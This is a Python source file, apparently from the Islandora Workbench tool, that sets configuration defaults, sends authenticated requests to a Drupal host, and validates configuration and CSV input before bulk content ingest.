if 'drupal_filesystem' not in config:
config['drupal_filesystem'] = 'fedora://'
if 'id_field' not in config:
config['id_field'] = 'id'
if 'content_type' not in config:
config['content_type'] = 'islandora_object'
if 'delimiter' not in config:
config['delimiter'] = ','
if 'subdelimiter' not in config:
config['subdelimiter'] = '|'
if 'log_file_path' not in config:
config['log_file_path'] = 'workbench.log'
if 'log_file_mode' not in config:
config['log_file_mode'] = 'a'
if 'allow_missing_files' not in config:
config['allow_missing_files'] = False
if 'update_mode' not in config:
config['update_mode'] = 'replace'
if 'validate_title_length' not in config:
config['validate_title_length'] = True
if 'paged_content_from_directories' not in config:
config['paged_content_from_directories'] = False
if 'delete_media_with_nodes' not in config:
config['delete_media_with_nodes'] = True
if 'allow_adding_terms' not in config:
config['allow_adding_terms'] = False
if 'nodes_only' not in config:
config['nodes_only'] = False
if 'log_json' not in config:
config['log_json'] = False
if 'progress_bar' not in config:
config['progress_bar'] = False
if 'user_agent' not in config:
config['user_agent'] = 'Islandora Workbench'
if 'allow_redirects' not in config:
config['allow_redirects'] = True
if 'google_sheets_csv_filename' not in config:
config['google_sheets_csv_filename'] = 'google_sheet.csv'
if 'google_sheets_gid' not in config:
config['google_sheets_gid'] = '0'
if 'excel_worksheet' not in config:
config['excel_worksheet'] = 'Sheet1'
if 'excel_csv_filename' not in config:
config['excel_csv_filename'] = 'excel.csv'
if 'use_node_title_for_media' not in config:
config['use_node_title_for_media'] = False
if 'delete_tmp_upload' not in config:
config['delete_tmp_upload'] = False
if config['task'] == 'create':
if 'id_field' not in config:
config['id_field'] = 'id'
if config['task'] == 'create' or config['task'] == 'create_from_files':
if 'published' not in config:
config['published'] = 1
if config['task'] == 'create' or config['task'] == 'add_media' or config['task'] == 'create_from_files':
if 'preprocessors' in config_data:
config['preprocessors'] = {}
for preprocessor in config_data['preprocessors']:
for key, value in preprocessor.items():
config['preprocessors'][key] = value
if 'media_types' not in config:
config['media_types'] = []
image = collections.OrderedDict({'image': ['png', 'gif', 'jpg', 'jpeg']})
config['media_types'].append(image)
document = collections.OrderedDict({'document': ['pdf', 'doc', 'docx', 'ppt', 'pptx']})
config['media_types'].append(document)
file = collections.OrderedDict({'file': ['tif', 'tiff', 'jp2', 'zip', 'tar']})
config['media_types'].append(file)
audio = collections.OrderedDict({'audio': ['mp3', 'wav', 'aac']})
config['media_types'].append(audio)
video = collections.OrderedDict({'video': ['mp4']})
config['media_types'].append(video)
extracted_text = collections.OrderedDict({'extracted_text': ['txt']})
config['media_types'].append(extracted_text)
if config['task'] == 'create':
if 'paged_content_sequence_seprator' not in config:
config['paged_content_sequence_seprator'] = '-'
if 'paged_content_page_content_type' not in config:
config['paged_content_page_content_type'] = config['content_type']
if args.check:
config['check'] = True
else:
config['check'] = False
if args.get_csv_template:
config['get_csv_template'] = True
else:
config['get_csv_template'] = False
return config
def set_media_type(filepath, config):
"""Using configuration options, determine which media bundle type to use.
Options are either a single media type or a set of mappings from
file extenstion to media type.
"""
if 'media_type' in config:
return config['media_type']
extension_with_dot = os.path.splitext(filepath)[1]
extension = extension_with_dot[1:]
normalized_extension = extension.lower()
for types in config['media_types']:
for type, extensions in types.items():
if normalized_extension in extensions:
return type
# If extension isn't in one of the lists, default to 'file' bundle.
return 'file'
def set_model_from_extension(file_name, config):
"""Using configuration options, determine which Islandora Model value
to assign to nodes created from files. Options are either a single model
or a set of mappings from file extenstion to Islandora Model term ID.
"""
if config['task'] != 'create_from_files':
return None
if 'model' in config:
return config['model']
extension_with_dot = os.path.splitext(file_name)[1]
extension = extension_with_dot[1:]
normalized_extension = extension.lower()
for model_tids in config['models']:
for tid, extensions in model_tids.items():
if str(tid).startswith('http'):
tid = get_term_id_from_uri(config, tid)
if normalized_extension in extensions:
return tid
# If the file's extension is not listed in the config,
# We use the term ID that contains an empty extension.
if '' in extensions:
return tid
def issue_request(
config,
method,
path,
headers=dict(),
json='',
data='',
query={}):
"""Issue the HTTP request to Drupal.
"""
if config['check'] is False:
if 'pause' in config and method in ['POST', 'PUT', 'PATCH', 'DELETE']:
time.sleep(config['pause'])
headers.update({'User-Agent': config['user_agent']})
config['host'] = config['host'].rstrip('/')
if config['host'] in path:
url = path
else:
url = config['host'] + path
if method == 'GET':
response = requests.get(
url,
allow_redirects=config['allow_redirects'],
auth=(config['username'], config['password']),
params=query,
headers=headers
)
if method == 'HEAD':
response = requests.head(
url,
allow_redirects=config['allow_redirects'],
auth=(config['username'], config['password']),
headers=headers
)
if method == 'POST':
if config['log_json'] is True:
logging.info(json)
response = requests.post(
url,
allow_redirects=config['allow_redirects'],
auth=(config['username'], config['password']),
headers=headers,
json=json,
data=data
)
if method == 'PUT':
if config['log_json'] is True:
logging.info(json)
response = requests.put(
url,
allow_redirects=config['allow_redirects'],
auth=(config['username'], config['password']),
headers=headers,
json=json,
data=data
)
if method == 'PATCH':
if config['log_json'] is True:
logging.info(json)
response = requests.patch(
url,
allow_redirects=config['allow_redirects'],
auth=(config['username'], config['password']),
headers=headers,
json=json,
data=data
)
if method == 'DELETE':
response = requests.delete(
url,
allow_redirects=config['allow_redirects'],
auth=(config['username'], config['password']),
headers=headers
)
return response
def ping_node(config, nid):
"""Ping the node to see if it exists.
"""
url = config['host'] + '/node/' + nid + '?_format=json'
response = issue_request(config, 'HEAD', url)
# @todo: Add 301 and 302 to the allowed status codes?
if response.status_code == 200:
return True
else:
logging.warning(
"Node ping (HEAD) on %s returned a %s status code",
url,
response.status_code)
return False
def ping_url_alias(config, url_alias):
"""Ping the URL alias to see if it exists. Return the status code.
"""
url = config['host'] + url_alias + '?_format=json'
response = issue_request(config, 'GET', url)
return response.status_code
def ping_islandora(config, print_message=True):
"""Connect to Islandora in prep for subsequent HTTP requests.
"""
# First, test a known request that requires Administrator-level permissions.
url = config['host'] + '/islandora_workbench_integration/upload_max_filesize'
try:
host_response = issue_request(config, 'GET', url)
except requests.exceptions.Timeout as err_timeout:
message = 'Workbench timed out trying to reach ' + \
config['host'] + '. Please verify the "host" setting in your configuration ' + \
'and check your network connection.'
logging.error(message)
logging.error(err_timeout)
sys.exit('Error: ' + message)
except requests.exceptions.ConnectionError as error_connection:
message = 'Workbench cannot connect to ' + \
config['host'] + '. Please verify the "host" setting in your configuration ' + \
'and check your network connection.'
logging.error(message)
logging.error(error_connection)
sys.exit('Error: ' + message)
if host_response.status_code == 404:
message = 'Workbench cannot detect whether the Islandora Workbench Integration module is ' + \
'enabled on ' + config['host'] + '. Please ensure it is enabled.'
logging.error(message)
sys.exit('Error: ' + message)
not_authorized = [401, 403]
if host_response.status_code in not_authorized:
message = 'Workbench can connect to ' + \
config['host'] + ' but the user "' + config['username'] + \
'" does not have sufficient permissions to continue, or the credentials are invalid.'
logging.error(message)
sys.exit('Error: ' + message)
message = "OK, connection to Drupal at " + config['host'] + " verified."
if print_message is True:
logging.info(message)
print(message)
def ping_remote_file(url):
'''Logging, exiting, etc. happens in caller, except on requests error.
'''
sections = urllib.parse.urlparse(url)
try:
response = requests.head(url, allow_redirects=True)
return response.status_code
except requests.exceptions.Timeout as err_timeout:
message = 'Workbench timed out trying to reach ' + \
sections.netloc + ' while connecting to ' + url + '. Please verify that URL and check your network connection.'
logging.error(message)
logging.error(err_timeout)
sys.exit('Error: ' + message)
except requests.exceptions.ConnectionError as error_connection:
message = 'Workbench cannot connect to ' + \
sections.netloc + ' while connecting to ' + url + '. Please verify that URL and check your network connection.'
logging.error(message)
logging.error(error_connection)
sys.exit('Error: ' + message)
def get_field_definitions(config):
"""Get field definitions from Drupal.
"""
ping_islandora(config, print_message=False)
# For media, entity_type will need to be 'media' and bundle_type will
# need to be one of 'image', 'document', 'audio', 'video', 'file'
entity_type = 'node'
bundle_type = config['content_type']
field_definitions = {}
fields = get_entity_fields(config, entity_type, bundle_type)
for fieldname in fields:
field_definitions[fieldname] = {}
raw_field_config = get_entity_field_config(config, fieldname, entity_type, bundle_type)
field_config = json.loads(raw_field_config)
field_definitions[fieldname]['entity_type'] = field_config['entity_type']
field_definitions[fieldname]['required'] = field_config['required']
field_definitions[fieldname]['label'] = field_config['label']
raw_vocabularies = [x for x in field_config['dependencies']['config'] if re.match("^taxonomy.vocabulary.", x)]
if len(raw_vocabularies) > 0:
vocabularies = [x.replace("taxonomy.vocabulary.", '')
for x in raw_vocabularies]
field_definitions[fieldname]['vocabularies'] = vocabularies
if entity_type == 'media' and 'file_extensions' in field_config['settings']:
field_definitions[fieldname]['file_extensions'] = field_config['settings']['file_extensions']
if entity_type == 'media':
field_definitions[fieldname]['media_type'] = bundle_type
raw_field_storage = get_entity_field_storage(config, fieldname, entity_type)
field_storage = json.loads(raw_field_storage)
field_definitions[fieldname]['field_type'] = field_storage['type']
field_definitions[fieldname]['cardinality'] = field_storage['cardinality']
if 'max_length' in field_storage['settings']:
field_definitions[fieldname]['max_length'] = field_storage['settings']['max_length']
else:
field_definitions[fieldname]['max_length'] = None
if 'target_type' in field_storage['settings']:
field_definitions[fieldname]['target_type'] = field_storage['settings']['target_type']
else:
field_definitions[fieldname]['target_type'] = None
if field_storage['type'] == 'typed_relation' and 'rel_types' in field_config['settings']:
field_definitions[fieldname]['typed_relations'] = field_config['settings']['rel_types']
field_definitions['title'] = {'entity_type': 'node', 'required': True, 'label': 'Title', 'field_type': 'string', 'cardinality': 1, 'max_length': 255, 'target_type': None}
return field_definitions
def get_entity_fields(config, entity_type, bundle_type):
"""Get all the fields configured on a bundle.
"""
fields_endpoint = config['host'] + '/entity/entity_form_display/' + \
entity_type + '.' + bundle_type + '.default?_format=json'
bundle_type_response = issue_request(config, 'GET', fields_endpoint)
fields = []
if bundle_type_response.status_code == 200:
node_config_raw = json.loads(bundle_type_response.text)
fieldname_prefix = 'field.field.node.' + bundle_type + '.'
fieldnames = [
field_dependency.replace(
fieldname_prefix,
'') for field_dependency in node_config_raw['dependencies']['config']]
for fieldname in node_config_raw['dependencies']['config']:
fieldname_prefix = 'field.field.' + entity_type + '.' + bundle_type + '.'
if re.match(fieldname_prefix, fieldname):
fieldname = fieldname.replace(fieldname_prefix, '')
fields.append(fieldname)
else:
message = 'Workbench cannot retrieve field definitions from Drupal. Please confirm that the Field, Field Storage, and Entity Form Display REST resources are enabled.'
logging.error(message)
sys.exit('Error: ' + message)
return fields
def get_entity_field_config(config, fieldname, entity_type, bundle_type):
"""Get a specific fields's configuration.
"""
field_config_endpoint = config['host'] + '/entity/field_config/' + \
entity_type + '.' + bundle_type + '.' + fieldname + '?_format=json'
field_config_response = issue_request(config, 'GET', field_config_endpoint)
if field_config_response.status_code == 200:
return field_config_response.text
else:
message = 'Workbench cannot retrieve field definitions from Drupal. Please confirm that the Field, Field Storage, and Entity Form Display REST resources are enabled.'
logging.error(message)
sys.exit('Error: ' + message)
def get_entity_field_storage(config, fieldname, entity_type):
"""Get a specific fields's storage configuration.
"""
field_storage_endpoint = config['host'] + '/entity/field_storage_config/' + \
entity_type + '.' + fieldname + '?_format=json'
field_storage_response = issue_request(
config, 'GET', field_storage_endpoint)
if field_storage_response.status_code == 200:
return field_storage_response.text
else:
message = 'Workbench cannot retrieve field definitions from Drupal. Please confirm that the Field, Field Storage, and Entity Form Display REST resources are enabled.'
logging.error(message)
sys.exit('Error: ' + message)
def check_input(config, args):
"""Validate the config file and input data.
"""
logging.info(
'Starting configuration check for "%s" task using config file %s.',
config['task'],
args.config)
ping_islandora(config, print_message=False)
base_fields = ['title', 'status', 'promote', 'sticky', 'uid', 'created']
# Check the config file.
tasks = [
'create',
'update',
'delete',
'add_media',
'delete_media',
'create_from_files']
joiner = ', '
if config['task'] not in tasks:
message = '"task" in your configuration file must be one of "create", "update", "delete", "add_media", or "create_from_files".'
logging.error(message)
sys.exit('Error: ' + message)
config_keys = list(config.keys())
config_keys.remove('check')
# Check for presence of required config keys, which varies by task.
if config['task'] == 'create':
if config['nodes_only'] is True:
message = '"nodes_only" option in effect. Media files will not be checked/validated.'
print(message)
logging.info(message)
create_required_options = [
'task',
'host',
'username',
'password']
for create_required_option in create_required_options:
if create_required_option not in config_keys:
message = 'Please check your config file for required values: ' \
+ joiner.join(create_options) + '.'
logging.error(message)
sys.exit('Error: ' + message)
if config['task'] == 'update':
update_required_options = [
'task',
'host',
'username',
'password']
for update_required_option in update_required_options:
if update_required_option not in config_keys:
message = 'Please check your config file for required values: ' \
+ joiner.join(update_required_options) + '.'
logging.error(message)
sys.exit('Error: ' + message)
update_mode_options = ['replace', 'append', 'delete']
if config['update_mode'] not in update_mode_options:
message = 'Your "update_mode" config option must be one of the following: ' \
+ joiner.join(update_mode_options) + '.'
logging.error(message)
sys.exit('Error: ' + message)
if config['task'] == 'delete':
delete_required_options = [
'task',
'host',
'username',
'password']
for delete_required_option in delete_required_options:
if delete_required_option not in config_keys:
message = 'Please check your config file for required values: ' \
+ joiner.join(delete_required_options) + '.'
logging.error(message)
sys.exit('Error: ' + message)
if config['task'] == 'add_media':
add_media_required_options = [
'task',
'host',
'username',
'password']
for add_media_required_option in add_media_required_options:
if add_media_required_option not in config_keys:
message = 'Please check your config file for required values: ' \
+ joiner.join(add_media_required_options) + '.'
logging.error(message)
sys.exit('Error: ' + message)
if config['task'] == 'delete_media':
delete_media_required_options = [
'task',
'host',
'username',
'password']
for delete_media_required_option in delete_media_required_options:
if delete_media_required_option not in config_keys:
message = 'Please check your config file for required values: ' \
+ joiner.join(delete_media_required_options) + '.'
logging.error(message)
sys.exit('Error: ' + message)
message = 'OK, configuration file has all required values (did not check for optional values).'
print(message)
logging.info(message)
# Check existence of CSV file.
if os.path.isabs(config['input_csv']):
input_csv = config['input_csv']
# The actual "extraction" is fired over in workbench.
elif config['input_csv'].startswith('http'):
input_csv = os.path.join(config['input_dir'], config['google_sheets_csv_filename'])
message = "Extracting CSV data from " + config['input_csv'] + " (worksheet gid " + str(config['google_sheets_gid']) + ") to " + input_csv + '.'
print(message)
logging.info(message)
elif config['input_csv'].endswith('xlsx'):
input_csv = os.path.join(config['input_dir'], config['excel_csv_filename'])
message = "Extracting CSV data from " + config['input_csv'] + " to " + input_csv + '.'
print(message)
logging.info(message)
else:
input_csv = os.path.join(config['input_dir'], config['input_csv'])
if os.path.exists(input_csv):
message = 'OK, CSV file ' + input_csv + ' found.'
print(message)
logging.info(message)
else:
message = 'CSV file ' + input_csv + ' not found.'
logging.error(message)
sys.exit('Error: ' + message)
# Check column headers in CSV file.
csv_data = get_csv_data(config)
csv_column_headers = csv_data.fieldnames
# Check whether each row contains the same number of columns as there are headers.
for count, row in enumerate(csv_data, start=1):
string_field_count = 0
for field in row:
if (row[field] is not None):
string_field_count += 1
if len(csv_column_headers) > string_field_count:
logging.error("Row %s of your CSV file does not " +
"have same number of columns (%s) as there are headers " +
"(%s).", str(count), str(string_field_count), str(len(csv_column_headers)))
sys.exit("Error: Row " +
str(count) +
" of your CSV file " +
"does not have same number of columns (" +
str(string_field_count) +
") as there are headers (" +
str(len(csv_column_headers)) +
").")
if len(csv_column_headers) < string_field_count:
logging.error("Row %s of your CSV file has more columns (%s) than there are headers " +
"(%s).", str(count), str(string_field_count), str(len(csv_column_headers)))
sys.exit("Error: Row " +
str(count) +
" of your CSV file " +
"has more columns (" + str(string_field_count) + ") than there are headers (" +
str(len(csv_column_headers)) +
").")
message = "OK, all " \
+ str(count) + " rows in the CSV file have the same number of columns as there are headers (" \
+ str(len(csv_column_headers)) + ")."
print(message)
logging.info(message)
# Task-specific CSV checks.
langcode_was_present = False
if config['task'] == 'create':
field_definitions = get_field_definitions(config)
if config['id_field'] not in csv_column_headers:
message = 'For "create" tasks, your CSV file must have a column containing a unique identifier.'
logging.error(message)
sys.exit('Error: ' + message)
if config['nodes_only'] is False and 'file' not in csv_column_headers and config['paged_content_from_directories'] is False:
message = 'For "create" tasks, your CSV file must contain a "file" column.'
logging.error(message)
sys.exit('Error: ' + message)
if 'title' not in csv_column_headers:
message = 'For "create" tasks, your CSV file must contain a "title" column.'
logging.error(message)
sys.exit('Error: ' + message)
if 'output_csv' in config.keys():
if os.path.exists(config['output_csv']):
message = 'Output CSV already exists at ' + \
config['output_csv'] + ', records will be appended to it.'
print(message)
logging.info(message)
if 'url_alias' in csv_column_headers:
validate_url_aliases_csv_data = get_csv_data(config)
validate_url_aliases(config, validate_url_aliases_csv_data)
# Specific to creating paged content. Current, if 'parent_id' is present
# in the CSV file, so must 'field_weight' and 'field_member_of'.
if 'parent_id' in csv_column_headers:
if ('field_weight' not in csv_column_headers or 'field_member_of' not in csv_column_headers):
message = 'If your CSV file contains a "parent_id" column, it must also contain "field_weight" and "field_member_of" columns.'
logging.error(message)
sys.exit('Error: ' + message)
drupal_fieldnames = []
for drupal_fieldname in field_definitions:
drupal_fieldnames.append(drupal_fieldname)
if len(drupal_fieldnames) == 0:
message = 'Workbench cannot retrieve field definitions from Drupal. Please confirm that the Field, Field Storage, and Entity Form Display REST resources are enabled.'
logging.error(message)
sys.exit('Error: ' + message)
# We .remove() CSV column headers for this check because they are not Drupal field names (including 'langcode').
# Any new columns introduced into the CSV need to be removed here.
if config['id_field'] in csv_column_headers:
csv_column_headers.remove(config['id_field'])
if 'file' in csv_column_headers:
csv_column_headers.remove('file')
if 'node_id' in csv_column_headers:
csv_column_headers.remove('node_id')
if 'parent_id' in csv_column_headers:
csv_column_headers.remove('parent_id')
if 'image_alt_text' in csv_column_headers:
csv_column_headers.remove('image_alt_text')
if 'url_alias' in csv_column_headers:
csv_column_headers.remove('url_alias')
# langcode is a standard Drupal field but it doesn't show up in any field configs.
if 'langcode' in csv_column_headers:
csv_column_headers.remove('langcode')
# Set this so we can validate langcode below.
langcode_was_present = True
for csv_column_header in csv_column_headers:
if csv_column_header not in drupal_fieldnames and csv_column_header not in base_fields:
logging.error(
"CSV column header %s does not match any Drupal field names.",
csv_column_header)
sys.exit(
'Error: CSV column header "' +
csv_column_header +
'" does not match any Drupal field names.')
message = 'OK, CSV column headers match Drupal field names.'
print(message)
logging.info(message)
# Check that Drupal fields that are required are in the CSV file (create task only).
if config['task'] == 'create':
required_drupal_fields = []
for drupal_fieldname in field_definitions:
# In the create task, we only check for required fields that apply to nodes.
if 'entity_type' in field_definitions[drupal_fieldname] and field_definitions[
drupal_fieldname]['entity_type'] == 'node':
if 'required' in field_definitions[drupal_fieldname] and field_definitions[
drupal_fieldname]['required'] is True:
required_drupal_fields.append(drupal_fieldname)
for required_drupal_field in required_drupal_fields:
if required_drupal_field not in csv_column_headers:
logging.error(
"Required Drupal field %s is not present in the CSV file.",
required_drupal_field)
sys.exit(
'Error: Field "' +
required_drupal_field +
'" required for content type "' +
config['content_type'] +
'" is not present in the CSV file.')
message = 'OK, required Drupal fields are present in the CSV file.'
print(message)
logging.info(message)
# Validate dates in 'created' field, if present.
if 'created' in csv_column_headers:
validate_node_created_csv_data = get_csv_data(config)
validate_node_created_date(validate_node_created_csv_data)
# Validate user IDs in 'uid' field, if present.
if 'uid' in csv_column_headers:
validate_node_uid_csv_data = get_csv_data(config)
validate_node_uid(config, validate_node_uid_csv_data)
if config['task'] == 'update':
if 'node_id' not in csv_column_headers:
message = 'For "update" tasks, your CSV file must contain a "node_id" column.'
logging.error(message)
sys.exit('Error: ' + message)
if 'url_alias' in csv_column_headers:
validate_url_aliases_csv_data = get_csv_data(config)
validate_url_aliases(config, validate_url_aliases_csv_data)
field_definitions = get_field_definitions(config)
drupal_fieldnames = []
for drupal_fieldname in field_definitions:
drupal_fieldnames.append(drupal_fieldname)
if 'title' in csv_column_headers:
csv_column_headers.remove('title')
if 'url_alias' in csv_column_headers:
csv_column_headers.remove('url_alias')
if 'image_alt_text' in csv_column_headers:
csv_column_headers.remove('image_alt_text')
if 'file' in csv_column_headers:
message = 'Error: CSV column header "file" is not allowed in update tasks.'
logging.error(message)
sys.exit(message)
if 'node_id' in csv_column_headers:
csv_column_headers.remove('node_id')
for csv_column_header in csv_column_headers:
if csv_column_header not in drupal_fieldnames:
logging.error(
'CSV column header %s does not match any Drupal field names.',
csv_column_header)
sys.exit(
'Error: CSV column header "' +
csv_column_header +
'" does not match any Drupal field names.')
message = 'OK, CSV column headers match Drupal field names.'
print(message)
logging.info(message)
if config['task'] == 'add_media' or config['task'] == 'create' and config['nodes_only'] is False:
validate_media_use_tid(config)
if config['task'] == 'update' or config['task'] == 'create':
validate_geolocation_values_csv_data = get_csv_data(config)
validate_geolocation_fields(config, field_definitions, validate_geolocation_values_csv_data)
validate_edtf_values_csv_data = get_csv_data(config)
validate_edtf_fields(config, field_definitions, validate_edtf_values_csv_data)
validate_csv_field_cardinality_csv_data = get_csv_data(config)
validate_csv_field_cardinality(config, field_definitions, validate_csv_field_cardinality_csv_data)
validate_csv_field_length_csv_data = get_csv_data(config)
validate_csv_field_length(config, field_definitions, validate_csv_field_length_csv_data)
# Validating values in CSV taxonomy fields requires a View installed by the Islandora Workbench Integration module.
# If the View is not enabled, Drupal returns a 404. Use a dummy vocabulary ID or we'll get a 404 even if the View
# is enabled.
terms_view_url = config['host'] + '/vocabulary/dummyvid?_format=json'
terms_view_response = issue_request(config, 'GET', terms_view_url)
if terms_view_response.status_code == 404:
logging.warning(
'Not validating taxonomy term IDs used in CSV file. To use this feature, install the Islandora Workbench Integration module.')
print('Warning: Not validating taxonomy term IDs used in CSV file. To use this feature, install the Islandora Workbench Integration module.')
else:
validate_taxonomy_field_csv_data = get_csv_data(config)
warn_user_about_taxo_terms = validate_taxonomy_field_values(config, field_definitions, validate_taxonomy_field_csv_data)
if warn_user_about_taxo_terms is True:
print('Warning: Issues detected with validating taxonomy field values in the CSV file. See the log for more detail.')
validate_csv_typed_relation_values_csv_data = get_csv_data(config)
warn_user_about_typed_relation_terms = validate_typed_relation_field_values(config, field_definitions, validate_csv_typed_relation_values_csv_data)
if warn_user_about_typed_relation_terms is True:
print('Warning: Issues detected with validating typed relation field values in the CSV file. See the log for more detail.')
# Validate length of 'title'.
if config['validate_title_length']:
validate_title_csv_data = get_csv_data(config)
for count, row in enumerate(validate_title_csv_data, start=1):
if len(row['title']) > 255:
message = "The 'title' column in row " + \
str(count) + " of your CSV file exceeds Drupal's maximum length of 255 characters."
logging.error(message)
sys.exit('Error: ' + message)
# Validate existence of nodes specified in 'field_member_of'. This could be generalized out to validate node IDs in other fields.
# See https://github.com/mjordan/islandora_workbench/issues/90.
validate_field_member_of_csv_data = get_csv_data(config)
for count, row in enumerate(
validate_field_member_of_csv_data, start=1):
if 'field_member_of' in csv_column_headers:
parent_nids = row['field_member_of'].split(
config['subdelimiter'])
for parent_nid in parent_nids:
if len(parent_nid) > 0:
parent_node_exists = ping_node(config, parent_nid)
if parent_node_exists is False:
message = "The 'field_member_of' field in row " + \
str(count) + " of your CSV file contains a node ID (" + parent_nid + ") that doesn't exist."
logging.error(message)
sys.exit('Error: ' + message)
# Validate 'langcode' values if that field exists in the CSV.
if langcode_was_present:
validate_langcode_csv_data = get_csv_data(config)
for count, row in enumerate(validate_langcode_csv_data, start=1):
langcode_valid = validate_language_code(row['langcode'])
if not langcode_valid:
message = "Row " + \
str(count) + " of your CSV file contains an invalid Drupal language code (" + row['langcode'] + ") in its 'langcode' column."
logging.error(message)
sys.exit('Error: ' + message)
if config['task'] == 'delete':
if 'node_id' not in csv_column_headers:
message = 'For "delete" tasks, your CSV file must contain a "node_id" column.'
logging.error(message)
sys.exit('Error: ' + message)
if config['task'] == 'add_media':
if 'node_id' not in csv_column_headers:
message = 'For "add_media" tasks, your CSV file must contain a "node_id" column.'
logging.error(message)
sys.exit('Error: ' + message)
if 'file' not in csv_column_headers:
message = 'For "add_media" tasks, your CSV file must contain a "file" column.'
logging.error(message)
sys.exit('Error: ' + message)
if config['task'] == 'delete_media':
if 'media_id' not in csv_column_headers:
message = 'For "delete_media" tasks, your CSV file must contain a "media_id" column.'
logging.error(message)
sys.exit('Error: ' + message)
# Check for existence of files listed in the 'file' column.
if (config['task'] == 'create' or config['task'] == 'add_media') and config['paged_content_from_directories'] is False:
file_check_csv_data = get_csv_data(config)
if config['nodes_only'] is False and config['allow_missing_files'] is False:
for count, file_check_row in enumerate(file_check_csv_data, start=1):
if len(file_check_row['file']) == 0:
message = 'Row ' + file_check_row[config['id_field']] + ' contains an empty "file" value.'
logging.error(message)
sys.exit('Error: ' + message)
file_check_row['file'] = file_check_row['file'].strip()
if file_check_row['file'].startswith('http'):
http_response_code = ping_remote_file(file_check_row['file'])
if http_response_code != 200 or ping_remote_file(file_check_row['file']) is False:
message = 'Remote file ' + file_check_row['file'] + ' identified in CSV "file" column for record with ID field value ' \
+ file_check_row[config['id_field']] + ' not found or not accessible (HTTP response code ' + str(http_response_code) + ').'
logging.error(message)
sys.exit('Error: ' + message)
if os.path.isabs(file_check_row['file']):
file_path = file_check_row['file']
else:
file_path = os.path.join(config['input_dir'], file_check_row['file'])
if not file_check_row['file'].startswith('http'):
if not os.path.exists(file_path) or not os.path.isfile(file_path):
message = 'File ' + file_path + ' identified in CSV "file" column for record with ID field value ' \
+ file_check_row[config['id_field']] + ' not found.'
logging.error(message)
sys.exit('Error: ' + message)
message = 'OK, files named in the CSV "file" column are all present.'
print(message)
logging.info(message)
empty_file_values_exist = False
if config['nodes_only'] is False and config['allow_missing_files'] is True:
for count, file_check_row in enumerate(
file_check_csv_data, start=1):
if len(file_check_row['file']) == 0:
empty_file_values_exist = True
else:
file_path = os.path.join(
config['input_dir'], file_check_row['file'])
if not os.path.exists(
file_path) or not os.path.isfile(file_path):
message = 'File ' + file_path + ' identified in CSV "file" column not found.'
logging.error(message)
sys.exit('Error: ' + message)
if empty_file_values_exist is True:
message = 'OK, files named in the CSV "file" column are all present; the "allow_missing_files" option is enabled and empty "file" values exist.'
print(message)
logging.info(message)
else:
message = 'OK, files named in the CSV "file" column are all present.'
print(message)
logging.info(message)
# @todo: check that each file's extension is allowed for the current media type usin get_registered_media_extensions().
# See https://github.com/mjordan/islandora_workbench/issues/126. Maybe also compare allowed extensions with those in
# 'media_type[s]' config option?
if config['task'] == 'create' and config['paged_content_from_directories'] is True:
if 'paged_content_page_model_tid' not in config:
message = 'If you are creating paged content, you must include "paged_content_page_model_tid" in your configuration.'
logging.error(
'Configuration requires "paged_content_page_model_tid" setting when creating paged content.')
sys.exit('Error: ' + message)
paged_content_from_directories_csv_data = get_csv_data(config)
for count, file_check_row in enumerate(
paged_content_from_directories_csv_data, start=1):
dir_path = os.path.join(
config['input_dir'], file_check_row[config['id_field']])
if not os.path.exists(dir_path) or os.path.isfile(dir_path):
message = 'Page directory ' + dir_path + ' for CSV record with ID "' \
+ file_check_row[config['id_field']] + '"" not found.'
logging.error(message)
sys.exit('Error: ' + message)
page_files = os.listdir(dir_path)
if len(page_files) == 0:
print(
'Warning: Page directory ' +
dir_path +
' is empty; is that intentional?')
logging.warning('Page directory ' + dir_path + ' is empty.')
for page_file_name in page_files:
if config['paged_content_sequence_seprator'] not in page_file_name:
message = 'Page file ' + os.path.join(
dir_path,
page_file_name) + ' does not contain a sequence separator (' + config['paged_content_sequence_seprator'] + ').'
logging.error(message)
sys.exit('Error: ' + message)
print('OK, page directories are all present.')
# If nothing has failed by now, exit with a positive, upbeat message.
print("Configuration and input data appear to be valid.")
logging.info('Configuration checked for "%s" task using config file %s, no problems found.', config['task'], args.config)
sys.exit(0)
def get_registered_media_extensions(field_definitions):
# Unfinished. See https://github.com/mjordan/islandora_workbench/issues/126.
for field_name, field_def in field_definitions.items():
print("Field name: " + field_name + ' / ' + str(field_def))
"""
print(field_def)
if field_def['entity_type'] == 'media':
if 'file_extensions' in field_def:
print('Allowed file extensions for ' + field_def['media_type'] + ' :' + field_def['file_extensions'])
else:
print("No file extensions for " + field_def['media_type'])
"""
def check_input_for_create_from_files(config, args):
"""Validate the config file and input data if task is 'create_from_files'.
"""
if config['task'] != 'create_from_files':
message = 'Your task must be "create_from_files".'
logging.error(message)
sys.exit('Error: ' + message)
logging.info('Starting configuration check for "%s" task using config file %s.', config['task'], args.config)
ping_islandora(config, print_message=False)
config_keys = list(config.keys())
unwanted_in_create_from_files = [
'check',
'delimiter',
'subdelimiter',
'allow_missing_files',
'validate_title_length',
'paged_content_from_directories',
'delete_media_with_nodes',
'allow_adding_terms']
for option in unwanted_in_create_from_files:
if option in config_keys:
config_keys.remove(option)
# Check for presence of required config keys.
create_required_options = [
'task',
'host',
'username',
'password']
for create_required_option in create_required_options:
if create_required_option not in config_keys:
message = 'Please check your config file for required values: ' \
+ joiner.join(create_options) + '.'
logging.error(message)
sys.exit('Error: ' + message)
# Check existence of input directory.
if os.path.exists(config['input_dir']):
message = 'OK, input directory "' + config['input_dir'] + '" found.'
print(message)
logging.info(message)
else:
message = 'Input directory "' + config['input_dir'] + '"" not found.'
logging.error(message)
sys.exit('Error: ' + message)
# Validate length of 'title'.
files = os.listdir(config['input_dir'])
for file_name in files:
filename_without_extension = os.path.splitext(file_name)[0]
if len(filename_without_extension) > 255:
message = 'The filename "' + filename_without_extension + \
'" exceeds Drupal\'s maximum length of 255 characters and cannot be used for a node title.'
logging.error(message)
sys.exit('Error: ' + message)
# Check that either 'model' or 'models' are present in the config file.
if ('model' not in config and 'models' not in config):
message = 'You must include either the "model" or "models" option in your configuration.'
logging.error(message)
sys.exit('Error: ' + message)
# If nothing has failed by now, exit with a positive message.
print("Configuration and input data appear to be valid.")
logging.info(
'Configuration checked for "%s" task using config file %s, no problems found.',
config['task'],
args.config)
sys.exit(0)
def log_field_cardinality_violation(field_name, record_id, cardinality):
"""Writes an entry to the log during create/update tasks if any field values
are sliced off. Workbench does this if the number of values in a field
exceeds the field's cardinality. record_id could be a value from the
configured id_field or a node ID.
"""
logging.warning(
"Adding all values in CSV field %s for record %s would exceed maximum " +
"number of allowed values (%s), so only adding first value.",
field_name,
record_id,
cardinality)
